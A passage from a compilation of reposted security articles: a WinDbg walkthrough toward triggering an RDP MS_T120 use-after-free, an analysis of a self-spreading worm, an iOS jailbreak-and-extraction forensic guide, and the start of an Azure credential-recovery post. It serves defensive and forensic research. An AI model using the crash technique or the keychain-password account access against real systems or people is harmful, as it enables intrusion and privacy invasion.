    and the other one on the “call _IcaBindChannel” within the IcaBindVirtualChannels.

    1*eZIx1sqp0EBMFDjIAJ_rTA.png

    The purpose of these breakpoints is to observe the creation of virtual channels and the order in which these channels are created.

    bp termdd!IcaBindChannel+0x55 ".printf \"rsi=%d and rbp=%d\\n\", rsi, rbp;dd rdi;.echo"
    bp termdd!IcaBindVirtualChannels+0x19e ".printf \"We got a MS_T120, r8=%d\\n\",r8;dd rcx;r $t0=rcx;.echo"

    The breakpoint first hits the following, with an index value of “31”:

    1*_yEEI0wzIXW8r_3f6GZASg.png

    Listing the call stack with “kb” shows the following:

    1*L6U0WL7B__gcxl-9yE7eRQ.png

    We can see that IcaBindChannel is called from IcaCreateChannel, which can be traced all the way to rdpwsx!MSCreateDomain. If we take a look at that function in a disassembler, we notice it is creating the MS_T120 channel:

    1*dd48IRwe_beYsfd225BZTA.png

    Also, by looking at the patched termdd.sys, we know that the patched code enforces the index of the MS_T120 virtual channel to be 31. This first breakpoint indicates that the first channel created is the MS_T120 channel.

    The next breakpoint hit is the 2nd breakpoint (within IcaBindVirtualChannels), followed by the 1st breakpoint (within IcaBindChannel) again:

    1*dEvUyKCqqEHJsDJq-iDsbw.png

    This gets hit because it observed the MS_T120 value in the clientNetworkData. If we compare the address and content displayed in the above image with the earlier one, we can see they are identical, meaning both refer to the same channel control structure. However, the reference to this structure is stored at two different locations:

    rsi = 31, rbp = 5; 
    [rax + (31 + 5) * 8 + 0xe0] = MST_120_structure
    rsi = 1, rbp = 5; 
    [rax + (1 + 5) * 8 + 0xe0] = MS_T120_structure

    In other words, there are two entries in the channel pointer table that reference the MS_T120 structure.
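    The arithmetic is easy to check against the expressions above; a quick sketch:

    // [rax + (index + offset) * 8 + 0xE0] -- a channel pointer table slot.
    const slot = (index, offset) => '0x' + ((index + offset) * 8 + 0xE0).toString(16);
    console.log(slot(31, 5)); // 0x200 -> the MS_T120 entry bound at creation
    console.log(slot(1, 5));  // 0x110 -> the second entry, via the client-chosen index 1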

    Afterwards, a few more channels are created which we don’t care about:

    1*0XpXhYpK3TruRMqd_Kb0lg.png
    index 7 with offset 5
    1*V9RHo_0uh1JSQrttxyqK4A.png
    index 0 with offset 0 and 1
    1*X1ocLB21TvYIq4chhKY4rg.png
    index 0 with offset 3 and 4

    The next step in finding other relevant code is to set a break-on-read/write on the MS_T120 structure. It is certain that the MS_T120 structure will be ‘touched’ again in the future.

    I set the break read/write breakpoint on the data within the red box, as shown in the following:

    1*tgOiIY68k5479OoUhM4A-g.png

    As we proceed with the execution, we get calls to IcaDereferenceChannel, which we’re not interested in. Then, we hit termdd!IcaFindChannel, with some more information to look into from the call stack:

    1*NpcA5JUnj9YNeOTsC8L5Sg.png

    The termdd!IcaChannelInput and termdd!IcaChannelInputInternal sounds like something that might process data sent to the virtual channel.

    A pro tip is to set a breakpoint before a function call to see whether the registers or the stack (depending on how data is passed to the function) contain recognizable or readable data.

    I will set a breakpoint on the call to IcaChannelInputInternal, within the IcaChannelInput function:

    1*2At3O-wfmyE_nDfiZmKnwQ.png
    bp termdd!IcaChannelInput+0xd8
    1*TdI8x5qBTYDBxcC1qtGHog.png

    We’re interested in calls to the IcaChannelInput breakpoint after IcaBindVirtualChannels has been called. In the above image, just before the call to IcaChannelInputInternal, the rax register holds an address that references the “A”s I passed as data through the virtual channel.

    I will now set another set of break on read/write on the “A”s to see what code will ‘touch’ them.

    ba r8 rax+0xa 

    The reason I had to add 0xA to the rax register is that the break on read/write requires an aligned address (ending in 0x0 or 0x8 in an x64 environment).
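    If the address you want to watch is not aligned, the usual trick is to round it down; a one-line sketch:

    // Round an address down to 8-byte alignment for an x64 'ba' breakpoint.
    const alignDown = addr => addr & ~7n;
    console.log(alignDown(0x030ec596n).toString(16)); // -> 30ec590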

     
    1*HUOcZ9-zDDUaOxCk5BG3Ww.png

    So the “A”s are now being processed by a “memmove” function. Looking at the call stack, the “memmove” is called from “IcaCopyDataToUserBuffer”.

    1*XwtI06FcqJopoA5qzT62bQ.png

    Let's step out (gu) of the “memmove” to see the destination address the “A”s are being copied to.

    1*AwCi9Gn1BIvhWVxluy__Ng.png

    Here it is in the disassembler:

     
    1*ta3wPY7F3Q-pI9D8Uh2qwg.png

    The values for “Src”, “Dst” and “Size” are as follow:

     
    1*eWBvBwc4_iNUO0BcjBCShw.png
    Src
     
    1*CfWNhH3n1UNZaIva7QD4wg.png
    Dst
     
    1*h7YQ6LOr4OmWaZECw2cdsg.png
    Size (0x20)

    So the “memmove” copies the “A”s from kernel address space into user address space.

    We will now set another group of break-on-read/write breakpoints on the user-mode addresses to see how these values are ‘touched’:

    ba r8 00000000`030ec590
    ba r8 00000000`030ec598
    ba r8 00000000`030ec5a0
    ba r8 00000000`030ec5a8

    (side note: If you get a message “Too many data breakpoints for processor 0…”, remove some of the older breakpoints you set then enter “g” again)

    We then get a hit on rdpwsx!IoThreadFunc:

    1*dn2Of3cIMZYm8f8XS_l5lA.png

    The breakpoint touched the memory section in the highlighted red box:

    1*Z7YT6CxNBCeSzONtaCp38Q.png

    The rdpwsx!IoThreadFunc appears to be the code that parses and handles the MS_T120 data content.

    1*OB_F6YbPzOJuCMZWQdEYiA.png

    Using a disassembler will provide a greater view:

    1*WetrbCoWpW1VCBYnVlqAag.png
    1*b_bKe4aOQF-FSv8vwIoAJg.png

    We will now use the “p” command to step over each instruction.

    1*V2B4Nvt7LzeSpjx7Wc9APg.png

    It looks like because I supplied ‘AAAA’, it took a different path.

    According to the blog post from ZDI, we need to send crafted data to the MS_T120 channel (over our selected index) so it will terminate the channel (freeing the MS_T120 channel control structure), such that when RDPWD!SignalBrokenConnection tries to reach the MS_T120 channel again over index 31 of the channel pointer table, it will use a freed MS_T120 channel control structure, leading to the crash.

    Based on the rdpwsx!IoThreadFunc, it appears to make sense to create crafted data that will hit the IcaChannelClose function.

    When the crafted data is correct, it will hit the rdpwsx!IcaChannelClose

    1*0BHufYT5djDQC88cxNMfbg.png

    Before stepping through IcaChannelClose, let's set a breakpoint on the MS_T120 channel control structure to see how it gets affected:

    1*Y8TDQzqoEXXnXO0b8RVFyQ.png

    fffffa80`074fcac0 is the current address for the MS_T120 structure
     
    1*G3NMQC-5mtPqa19JoQFbpw.png
    A breakpoint read is hit on fffffa80`074fcac0

    The following picture shows the call stack when the breakpoint read is hit. A call is made to ExFreePoolWithTag, which frees the MS_T120 channel control structure.

    1*fqk0hBug1IhyejA3yc5SVA.png

    We can proceed with “g” until we hit the breakpoint in termdd!IcaChannelInput:

    1*RQdv3tA3Rxd6Yv8blmD34g.png

    Taking a look at the address that holds the MS_T120 channel control structure, the content looks pretty different.

    Furthermore, the call stack shows the call to IcaChannelInput comes from RDPWD!SignalBrokenConnection. The ZDI blog noted this function gets called when the connection terminates.

    1*UHpyt8DixO0Xllsd5v_rZQ.png

    We will use “t” command to step into the IcaChannelInputInternal function. Once we’re inside the function, we will set a new breakpoint:

    bp termdd!IcaFindChannel
    1*yHbBkVqw_dCtTTrQWgoRDQ.png

    Once we’re inside the IcaFindChannel function, use “gu” to step out of it and return to the IcaChannelInputInternal function:

    1*Zv2KPJ_fxQ3mon0dzu26cw.png
    The MS_T120 object address is different from the MS_T120 objects shown above, as these images were taken across different debugging sessions

    The rax register holds the reference to the freed MS_T120 channel control structure.

    As we continue to step through the code, the address at MS_T120+0x18 is used as a parameter (rcx) to the ExEnterCriticalRegionAndAcquireResourceExclusive function:

    1*Ynl_4KUwRTsChKia2lpmJg.png

    Lets take a look at rcx:

    1*LReRDcLxD5l9CkJ-GCY9zw.png

    And there we go: if we dereference rcx, it is nothing! So let's step over ExEnterCriticalRegionAndAcquireResourceExclusive and see the result:

    1*A2fxsljel8cn6KoGKn7PIQ.png
  22. Dynamic Analysis of a Windows Malicious Self-Propagating Binary

    May 29, 2019 by Adrian Hada

    Dynamic analysis (execution of malware in a controlled, supervised environment) is one of the most powerful tools in the arsenal of a malware analyst. However, it does come with its challenges. Attackers are aware that they might be watched, so we must take steps to ensure that the analysis machine (aka: sandbox) is invisible to the binary under analysis. Also, since we are granting a piece of malware CPU time, it can use it to further the threat actor’s intent.

    In this blog post, I will walk you through the analysis of one such binary. The malware at hand infects a computer, steals some local information and then proceeds to identify vulnerable targets on the local network and in the greater internet. Once a target has been found, it attempts to deliver malware on that machine. Such self-propagating malware has been in the news a lot in the past couple of years because of WannaCry, Mirai and other threats exhibiting this behavior. However, this technique is not limited to these families of malware – self-propagation has been around since the Morris worm of the late ‘80s – and we expect it to be used more and more. This raises a dilemma for those analyzing malware – by not limiting the things malware does, we’re granting them useful CPU cycles. By limiting them, we are unable to completely analyze the malware to determine all of its capabilities. 

    AN INTERESTING TARGET

    The sample at hand is a Windows binary with SHA256 54a1d78c1734fa791c4ca2f8c62a4f0677cb764ed8b21e198e0934888a735ef8 that we detected in May.

    1

    Figure 1 - Basic information for binary

    The first things that stand out are its large size – 2.6MB – and the fact that it was compressed using PECompact2. PECompact is an application that is able to reduce the size of a given binary and, with the correct plugins, can also offer reverse-engineering protection. This is probably an attempt on the attacker’s part to make the binary smaller (faster and less conspicuous delivery) and harder for antivirus products to detect.

    A quick search on VirusTotal shows that this is not the case – 49 out of the 71 detection engines detect it as malicious. Some of the detection names point to The Shadow Brokers, Equation Group, and WannaCry. Community information also points to mimikatz, a tool used to steal interesting security tokens from Windows memory after an attacker has established a foothold.

    2

    Figure 2 - Detections pointing to known threats and leaks

    LOCAL EXECUTION

    When executed, the malicious binary drops multiple files on the Windows system. One of these is a version of mimikatz, as mentioned above, dropped under the name “C:\Users\All Users\mmkt.exe”. This file is executed and drops a series of files to the local file system containing interesting system tokens:

    • C:\ProgramData\uname
    • C:\Users\All users\uname
    • C:\ProgramData\upass
    • C:\Users\All users\upass

    Other dropped files include some necessary DLL files as well as six other interesting files: two executables, two XML files and two files with the extension “.fb”, all in the folder C:\ProgramData:

    • Blue.exe
    • Blue.xml
    • Blue.fb
    • Star.exe
    • Star.xml
    • Star.fb

    The 6 files belong to the exploitation toolkit known as FuzzBunch, part of the ShadowBrokers dump, and are required to execute the exploit known as ETERNALBLUE and the DOUBLEPULSAR backdoor that could be deployed using the exploit. The pair has been used in attacks extensively since the dump and WannaCry came out – see the ATI team blogpost on WannaCry as well as another blogpost on other threats exploiting this in the wild after the leak came out. Although the exploits in the ShadowBrokers dump have been around for quite some time, our 2019 Security Report clearly points out that exploitation attempts for vulnerable targets are alive and kicking.

    3

    Figure 3 - EternalBlue files from original dump

    The XML and .fb files are identical to the ones from the original ShadowBrokers leak.

    4

    Figure 4 - EternalBlue-2.2.0.fb from ShadowBrokers dump

    5

    Figure 5 - blue.fb from the sample analysis

    It becomes clear that this sample is intent upon spreading as far as possible. It’s time to look at the network traffic involved to identify what it is doing.

    NETWORK TRAFFIC

    Analyzing the network capture with Wireshark, we see a lot of different contacted endpoints:

    6

    Figure 6 - Extract from the list of IP addresses contacted by the sample

    The first two servers belong to Microsoft and Akamai and are clean traffic, Windows-related. Then comes the malware traffic itself – one to an IP address in Malaysia, probably command and control (C&C) traffic, the rest targeting consecutive IP addresses in China, part of the worming behavior. Up next, a long list of private IP addresses with little traffic – failed scans since these hosts did not exist in our local network. Note that our sandbox isn’t configured with the 192.168.0.0 network address, so it seems that the sample doesn’t rely solely on the existing interfaces but also on a hard-coded network range to be scanned.

    The sample scans for an impressive number of open ports on the hosts in both the local network and in the greater Internet. The ports attempted seem to be the same for both types of hosts.

    7

    Figure 7 - Extract from the ports scanned for one LAN IP

    Interesting ports that seem to be targeted include SSH, RDP, SMB, HTTP and many others.

    8

    Figure 8 - Unsuccessful attempts to connect to RDP and SMB on hosts

    COMMAND AND CONTROL TRAFFIC

    The sample connects to an IP address in Malaysia for C&C, first sending a login request.

    9

    Figure 9 - C&C check-in

    The request comes with a “hash” and a “url” parameter, both of which are hex strings. The “hash” parameter is likely used to identify the host. The “url” parameter is a string that was Base64 encoded and then hex-encoded. Decoding it reveals that the malware is checking in the Administrator credentials that were stolen using Mimikatz.

    10

    Figure 10 - Decoding checked in data – URL parameter
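    Replicating the decoding is straightforward; a Node.js sketch (the hex value below is a placeholder, not the actual captured parameter):

    // url parameter: hex-decode -> Base64 string -> Base64-decode -> plaintext.
    const hexValue = '59 57 52 74 61 57 34 3d'.replace(/ /g, ''); // placeholder bytes
    const b64 = Buffer.from(hexValue, 'hex').toString('ascii');   // "YWRtaW4="
    const plain = Buffer.from(b64, 'base64').toString('utf8');    // "admin"
    console.log(plain);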

    Then comes another request that returns the beginning of an internet IP address range to try to spread to:

    11

    Figure 11 - Receiving a target IP range to exploit from C&C

    From this point on, the malware starts scanning said network range. It periodically checks in interesting information to the C&C server – for example, after it has identified a server that is up, it checks in the location data – where to find the web server and what the page title is.

    12

    Figure 12 - Sending data on discovering network host up

    13

    Figure 13 - Decoding URL parameter, letting the C&C server know of discovered web server

    14

    Figure 14 - Decoding Title parameter, which sends the page title of the web server response

    EXPLOITATION AND POST-EXPLOITATION

    The binary attempts different exploit methods depending on open ports. For HTTP, for example, it attempts to access different pages – most to check if a vulnerability exists, but some of them with overt RCE attempts. One such example is an exploit against ThinkPHP that Sucuri previously reported as being used in the wild.

    15

    Figure 15 - ThinkPHP Exploit Attempt

    There is a minor difference in the payload from what Sucuri reported – this attacker attempts to execute “netstat -an” on the machine to get network info, whereas in the Sucuri report “uname” is used as the RCE test. Our honeypots detect the Sucuri payload every day, so it seems that the attempts come from different attackers targeting the same exploit.

    Another complete exploit targets the Apache Tomcat platform, CVE-2017-12615. The attacker attempts to upload a snippet of JSP code that they can then execute via a GET request:

    16

    Figure 16 - CVE-2017-12615 attempt to upload JSP code to server

    The name “satan.jsp” is a good hint of what this malware really is. In December of 2018, NSFocus blogged about the actors behind the Satan ransomware using a self-replicating worm component that would then download ransomware or a cryptocoin miner onto the exploited machines. The reported exploitation methods include a list of web application vulnerabilities that are very similar to the sample at hand – the two ThinkPHP vulnerabilities seem to be the only ones missing from the original report. The behavior they reported also includes SSH bruteforcing, plus ETERNALBLUE and DOUBLEPULSAR against SMB-capable hosts. It seems that we have identified our threat actor.

    17

    Figure 17 - JSP shell code that downloads a binary from a web server depending on platform

    The JSP code downloads an executable from the remote server, fast.exe, on Windows platforms, as well as a bash script on Linux platforms. It then executes the payload. The names involved in the script and JSP shell, “fast.exe”, “ft32”, “ft64”, “.loop” are similar to what NSFocus reported.

    Similar to the NSFocus report, the “ft*” and “fast.exe” are simple downloaders for the rest of the modules. “ft” contains a list of C&C servers to contact, in this case all of them in the same network range:

    18

    Figure 18 - String view of the "ft32" source code, which shows hints of persistence using Cron as well as C&C IP addresses

    Paths to all the different malware components to be downloaded are available – conn32 and conn64, cry32, cry64 and so on. Linux binaries are UPX-compressed and Windows ones use PECompact2. In short, on successful exploitation, the downloader module is installed on the machine; it subsequently tries to contact a C&C server, pull the different components onto the box and then start spreading, encrypting, mining or a combination of them, depending upon the malware author’s will. For a more detailed analysis, check out the NSFocus report mentioned above.

    RESOLVING THE ETHICAL DILEMMA

    The execution of this malware in our sandbox was mostly unrestricted. As a result, we were able to observe C&C communications and create a good signature. However, this is just what the threat actor desires – people executing his malware to spread it further. As a result, we’ve taken some precautions to limit the maximum amount of damage that sandboxing such samples can do – for example, not using any URLs accessed by these samples for our web crawler since that might lead us to re-executing exploits against innocent websites. Unfortunately, these steps are not perfect as we’ll always have to find balance between how much we allow and limit.

    CONCLUSION

    This is an example of the work that goes about when identifying an interesting binary. The work is not limited to simply classifying the malicious behavior but comprises other things as well – identifying ways of detecting the malware via local or network means, correlating information with known sources to validate our research as well as improve the current public knowledge of threat actors and their tools, improving our crawling ability to discover threats as quickly as possible as well as, in this case, making sure that our products are able to use all of this intelligence. 

    Analysis of this binary also revealed a few gaps in our honeypot tracking and exploit traffic simulation capabilities which we are actively working on – deploying honeypot improvements and creating new strikes. BreakingPoint customers already have access to most of the exploits identified during the analysis of this binary – strikes for ETERNALBLUE, Struts S2-045 and S2-047 and other vulnerabilities. ThreatARMOR and visibility customers with an ATI subscription benefit from these detections as well with C&C addresses now being identified and most of the exploits having been tracked by our honeypots for a good amount of time now. 

    LEVERAGE SUBSCRIPTION SERVICE TO STAY AHEAD OF ATTACKS

    The Ixia BreakingPoint Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia platforms.

     

    Sursa: https://www.ixiacom.com/company/blog/dynamic-analysis-windows-malicious-self-propagating-binary

  23. Step by Step Guide to iOS Jailbreaking and Physical Acquisition

    May 30th, 2019 by Oleg Afonin
     
     

    Unless you’re using GrayShift or Cellebrite services for iPhone extraction, jailbreaking is a required pre-requisite for physical acquisition. Physical access offers numerous benefits over other types of extraction; as a result, jailbreaking is in demand among experts and forensic specialists.

    The procedure of installing a jailbreak for the purpose of physical extraction is vastly different from jailbreaking for research or other purposes. In particular, forensic experts are struggling to keep devices offline in order to prevent data leaks, unwanted synchronization and issues with remote device management that may remotely block or erase the device. While there is no lack of jailbreaking guides and manuals for “general” jailbreaking, installing a jailbreak for the purpose of physical acquisition has multiple forensic implications and some important precautions.

    When performing forensic extraction of an iOS device, we recommend the following procedure.

     

    Prepare the device and perform logical extraction

    1. Enable Airplane mode on the device.

      This is required in order to isolate the device from wireless networks and cut off Internet connectivity.
    2. Verify that Wi-Fi, Bluetooth and Mobile Data toggles are all switched off.

      Recent versions of iOS allow keeping (or manually toggling) Wi-Fi and Bluetooth connectivity even after Airplane mode is activated. This allows iOS devices to keep connectivity with the Apple Watch, wireless headphones and other accessories. Since we don’t want any of that during the extraction, we’ll need to make sure all of these connectivity options are disabled.
    3. Unlock the device. Do not remove the passcode.

      While you could switch the device into Airplane mode without unlocking the phone, the rest of the process requires the device with its screen unlocked. While some jailbreaking and acquisition guides (including our own old guides) may recommend removing the passcode, don’t. Removing the passcode makes iOS erase certain types of data such as Apple Pay transactions, downloaded Exchange mail and some other bits and pieces. Do not remove the passcode.
    4. Pair the device to your computer by establishing trust (note: passcode required!)

      Since iOS 11, iOS devices require the passcode in order to establish a pairing relationship with the computer. This means that you will need the passcode to pair the iPhone to your computer. Without pairing, you won’t be able to sideload the jailbreak IPA onto the phone.
    5. Make sure that your computer’s Wi-Fi is disabled. This required step is frequently forgotten, resulting in a failed extraction.

      While it is not immediately obvious, we strongly recommend disabling Wi-Fi connectivity on your computer if it has one. If you keep Wi-Fi enabled on your computer and there is another iOS device on the network, iOS Forensic Toolkit may accidentally connect to that other device, and the extraction will fail.
    6. Launch iOS Forensic Toolkit.

      Make sure that both the iPhone and the license dongle are connected to your computer’s USB ports. iOS Forensic Toolkit is available from https://www.elcomsoft.com/eift.html
    7. Using iOS Forensic Toolkit, perform all steps for logical acquisition.

      iOS Forensic Toolkit supports what is frequently referred to as “Advanced Logical Extraction”. During this process, you will make a fresh local backup; obtain device information (hardware, iOS version, list of installed applications); and extract crash logs, media files, and shared app data. If the iOS device does not have a backup password, iOS Forensic Toolkit will set a temporary password of ‘123’ in order to allow access to certain types of data (e.g. messages and keychain items). If a backup password is configured and you don’t know it, you may be able to reset the backup password on the device (iOS 11 and 12: the Reset All Settings command; passcode required), then repeat the procedure. However, since the Reset All Settings command also removes the device passcode, you will lose access to Apple Pay transactions and some other data. Refer to “If you have to reset the backup password” for instructions.

    Prepare for jailbreaking and install a jailbreak

    1. Identify hardware and iOS version the device is running (iOS Forensic Toolkit > (I)nformation).
    2. Identify the correct jailbreak supporting the combination of device hardware and software. The following jailbreaks are available for recent versions of iOS:

      iOS 12 – 12.1.2
      RootlessJB (recommended if compatible with the hardware/iOS version, as the least invasive): https://github.com/jakeajames/rootlessJB

      iOS 11.x – 12.1.2
      unc0ver jailbreak (source code available): https://github.com/pwn20wndstuff/Undecimus

      iOS 12 – 12.1.2
      Chimera jailbreak: https://chimera.sh/

      Other jailbreaks exist. They may or may not work for the purpose of forensic extraction.

    3. Make sure you have an Apple Account that is registered in the Apple Developer Program (enrollment as a developer carries a yearly fee).

      Using an Apple Account enrolled in the Apple Developer Program allows sideloading an IPA while the device is offline and without manually approving the signing certificate in the device settings (which requires the device to connect to an Apple server). Note: a “personal” developer account is not sufficient for our purposes; you require a “corporate” developer account instead.
    4. Log in to your developer Apple Account and create an app-specific password.

      All Apple accounts enrolled in the Apple Developer Program are required to have two-factor authentication. Since Cydia Impactor does not support two-factor authentication, an app-specific password is required to sign and sideload the jailbreak IPA.
    5. Launch Cydia Impactor and sideload the jailbreak IPA using the Apple ID and app-specific password of your Apple developer account.

      Note: Cydia Impactor will prompt you about which signing certificate to use. Select the developer certificate from the list. Since you have signed the IPA file using your developer account, approving the signing certificate on the iOS device is not required. The iOS device will remain offline.
    6. Launch the jailbreak and follow the instructions. Note: we recommend creating a system snapshot if one is offered by the jailbreak.

    Troubleshooting jailbreaks

    Modern jailbreaks (targeting iOS 10 and newer) are relatively safe to use since they are not modifying the kernel. As a result, the jailbroken device will always boot in non-jailbroken state; a jailbreak must be reapplied after each reboot.

    Jailbreaks exploit chains of vulnerabilities in the operating system in order to obtain superuser privileges, escape the sandbox and allow the execution of unsigned applications. Since multiple vulnerabilities are consecutively exploited, the jailbreaking process may fail at any time.

    It is not unusual for jailbreaking attempts to fail on the first try. If the first attempt fails, you have the following options:

    1. Reattempt the jailbreak by re-running the jailbreak app.
    2. If this fails, reboot the device, unlock it with the passcode, then wait for about 3 minutes to allow all background processes to start. Then reattempt the jailbreak.
    3. You may need to repeat Step 2 several times for the jailbreak to install. However, if the above procedure does not work after multiple attempts, we recommend trying a different jailbreak tool. For example, we counted no fewer than five different jailbreak tools for iOS 12.0-12.1.2, some of them offering a higher success rate on certain hardware (and vice versa).
    4. Some jailbreaks have specific requirements, such as checking whether an iOS update has been downloaded (and removing the downloaded update if it is there). Do check the accompanying documentation.

    Troubleshooting iOS Forensic Toolkit

    If for any reason you have to close and restart iOS Forensic Toolkit, make sure to close the second window as well (the Secure channel window).

    If iOS Forensic Toolkit appears to be connected to the device but you receive unexpected results, close iOS Forensic Toolkit (both windows) and make sure that your computer is not connected to a Wi-Fi network. If that does not help, try disabling the wired network connection as well, since your computer may be operating on the same network as other iOS devices.

    Windows: the Windows version of iOS Forensic Toolkit will attempt to save extracted information to the folder where the tool is installed. While you can specify your own path to store data, it may be easier to move the EIFT installation to a shorter path (e.g. x:\eift\).

    Mac: a common mistake is attempting to run iOS Forensic Toolkit directly from the mounted DMG image. Instead, create a local directory and copy EIFT to that location.

    If you have to reset the backup password

    If the iPhone backup is protected with an unknown password, you may be tempted to quickly reset that password by using the “Reset All Settings” command. We recommend using this option with care, and only after making a full local backup “as is”.

    Resetting “all settings” will also remove the device passcode, which means that iOS will wipe the types of data that rely on passcode protection. This includes Apple Pay transactions, downloaded Exchange messages and some other data. In order to preserve all of that evidence, we recommend the following acquisition sequence:

    1. Perform the complete logical acquisition sequence “as is” with iOS Forensic Toolkit (the backup, media files, crash logs, shared app data).
    2. Jailbreak the device and capture the keychain and file system image. If this is successful, the keychain will contain the backup password.
    3. Reset backup password: if you are unable to install a jailbreak and perform physical acquisition even after you follow the relevant troubleshooting steps, consider resetting the backup password and following logical acquisition steps again to capture the backup. Note that if you create the backup with iOS Forensic Toolkit after resetting the password, that backup will be protected with a temporary password of ‘123’.

    Extracting the backup password from the keychain

    If you have successfully performed physical acquisition, you already have the decrypted iOS keychain at your disposal. The keychain stores the backup password, which you can use to decrypt the device backup. The backup password is stored in the “BackupAgent” item, as shown on the following screenshot:

    (Screenshot: the “BackupAgent” keychain item; in this example, the backup password is “JohnDoe”.)

    To discover that password, launch Elcomsoft Phone Breaker and select Explore keychain on the main screen. Click “Browse” > “Choose another” and specify the path to the keychaindump.xml file extracted with iOS Forensic Toolkit.

    The keychain is always encrypted. The backup password is stored with the ThisDeviceOnly attribute, and can only be extracted via physical acquisition.

    Perform physical extraction

    Once the device has been jailbroken, it becomes possible to extract the content of the file system and to obtain and decrypt the keychain.

    1. Make sure that the iOS device remains in Airplane mode, and Wi-Fi, Bluetooth and Mobile data toggles are disabled.
    2. Make sure that your computer’s Wi-Fi is disabled. This required step is frequently forgotten, resulting in a failed extraction. If you keep Wi-Fi enabled on your computer and there is another iOS device on the network, iOS Forensic Toolkit may accidentally connect to that other device, and the extraction will fail.
    3. Make sure the iOS device has been paired to the computer (or that you have a valid pairing/lockdown file ready).
    4. Unlock the iOS device and make sure its display is switched on. Connect the iOS device to the computer. Note: do not remove the passcode on the device! Otherwise, you will lose access to certain types of evidence such as Apple Pay transactions, downloaded Exchange mail and some other data.
    5. Launch iOS Forensic Toolkit.
    6. Use the (D)isable screen lock command from the main window to prevent the iOS device from locking automatically. This is required in order to access some elements of the file system that iOS tries to protect when the device is locked. Preventing screen lock is the simplest way to work around these protection measures.
    7. Extract the keychain with the (K)eychain command.
    8. Extract the file system image with the (F)ile system command.

    Analyzing the data

    As a result of your acquisition efforts, you may have all or some of the following pieces of evidence:

    1. Information about the device (XML) and the list of installed apps (text file). Use any XML or text viewer to analyze.
    2. A local backup in iTunes format. If you have followed this guide, the backup will be encrypted with a password, and the password is ‘123’. You can open the backup in any forensic tool that supports iTunes backups, such as Elcomsoft Phone Viewer. In order to analyze the keychain, you’ll have to open the backup with Elcomsoft Phone Breaker.
    3. Crash logs. You can analyze these using a text editor. Alternatively, refer to the following work about log file analysis: iOS Sysdiagnose Research (scripts: iOS sysdiagnose forensic scripts).
    4. Media files. Use any gallery or photo viewer app. You may want to use a tool that can extract EXIF information and, particularly, the geotags, in order to re-create the suspect’s location history (see the sketch after this list). The article iOS Photos.sqlite Forensics is also worth reading!
    5. Shared files. These files can be in any format, most commonly plist, XML or SQLite.
    6. Keychain (extracted with iOS Forensic Toolkit). Analyze with Elcomsoft Phone Breaker. The keychain contains passwords the user saved in Safari, system and third-party apps. These passwords can be used to sign in to the user’s mail and social network accounts. The passwords can be also used to create a highly targeted custom dictionary for attacking encrypted documents and full disk encryption with tools such as Elcomsoft Distributed Password Recovery.
    7. File system image (extracted with iOS Forensic Toolkit). Analyze with Elcomsoft Phone Viewer or unpack the TAR file and analyze manually or using your favorite forensic tool.
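
    As an illustration of the geotag idea, here is a minimal sketch that reads the GPS EXIF tags from a single photo. It assumes System.Drawing is available (Windows/.NET Framework); the tag IDs are the standard EXIF GPS properties, and file iteration and error handling are omitted:

    using System;
    using System.Drawing;
    using System.Linq;

    class GeoTagReader
    {
        // Standard EXIF GPS property IDs.
        const int GpsLatitudeRef = 0x0001, GpsLatitude = 0x0002;
        const int GpsLongitudeRef = 0x0003, GpsLongitude = 0x0004;

        // Converts an EXIF rational triplet (degrees, minutes, seconds),
        // stored as three pairs of 32-bit integers, to decimal degrees.
        static double ToDegrees(byte[] v)
        {
            double deg = (double)BitConverter.ToUInt32(v, 0) / BitConverter.ToUInt32(v, 4);
            double min = (double)BitConverter.ToUInt32(v, 8) / BitConverter.ToUInt32(v, 12);
            double sec = (double)BitConverter.ToUInt32(v, 16) / BitConverter.ToUInt32(v, 20);
            return deg + min / 60.0 + sec / 3600.0;
        }

        static void Main(string[] args)
        {
            // args[0]: path to a photo extracted from the device
            using (var image = Image.FromFile(args[0]))
            {
                if (!image.PropertyIdList.Contains(GpsLatitude) ||
                    !image.PropertyIdList.Contains(GpsLongitude))
                {
                    Console.WriteLine("No geotag present.");
                    return;
                }
                double lat = ToDegrees(image.GetPropertyItem(GpsLatitude).Value);
                double lon = ToDegrees(image.GetPropertyItem(GpsLongitude).Value);
                // Southern and western hemispheres are negative coordinates.
                if ((char)image.GetPropertyItem(GpsLatitudeRef).Value[0] == 'S') lat = -lat;
                if ((char)image.GetPropertyItem(GpsLongitudeRef).Value[0] == 'W') lon = -lon;
                Console.WriteLine($"{lat:F6}, {lon:F6}");
            }
        }
    }

    Running this over every photo in the media extraction and sorting the output by the EXIF timestamp yields a rough location timeline.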

     

    Sursa: https://blog.elcomsoft.com/2019/05/step-by-step-guide-to-ios-jailbreaking-and-physical-acquisition/

  24. March 19, 2018 – by Daniel Goldberg and Ofri Ziv

    Azure provides an incredible amount of add-on services for its IaaS offerings. These services are provided by the Azure Guest Agent through a large collection of plugins such as Chef integration, a Jenkins interface, a diagnostic channel for apps running inside the machine and many more. While researching the Azure Guest Agent, we’ve uncovered several security issues which have all been reported to Microsoft. This post will focus on a security design flaw in the VM Access plugin that may enable a cross platform attack impacting every machine type provided by Azure.

     

     

    Simply put, attackers can recover plaintext administrator passwords from machines by abusing the VM Access plugin. These may be reused to access different services, machines and databases. Keeping plaintext credentials can also violate key compliance regulations such as PCI-DSS and others. Microsoft has dismissed this issue and replied as follows: “…the way the agent & extension handlers work is by design.”

    In this post, we’ll cover the technical details of how the VM Access plugin works and how we managed to abuse this design flaw to recover “secure” plaintext data. Mitigation for this issue will also be discussed.

    The Azure VM Access plugin

    One of the many plugins Azure provides is VM Access, a plugin that helps users recover access to machines they have been inadvertently locked out of. This can be the result of mistakes made while configuring the machine, or because the login credentials have been forgotten. Azure allows users to reset both the machine configuration and the password of any local user.

    Due to the sensitive nature of credentials handling, we decided to take a closer look at this plugin. Password credentials are a valuable target for attackers, as credential reuse is a constant thorn in many organisations’ security posture. In recent Windows releases, credential storage has been repeatedly hardened, and since Windows 8.1 and Windows Server 2012, Windows hasn’t been keeping plaintext passwords at all. Plaintext passwords are even more valuable for attackers, as even minor manipulations on passwords can open multiple doors.

    We’ve discovered that since late 2015, attackers have been able to recover plaintext credentials after breaching and taking over an Azure virtual machine, provided the VM Access plugin was used at any point on that machine.

    Let’s take a quick look at the Azure Guest Agent and assemble the pieces to understand how the plaintext password can be extracted.

    How the Azure Guest Agent works

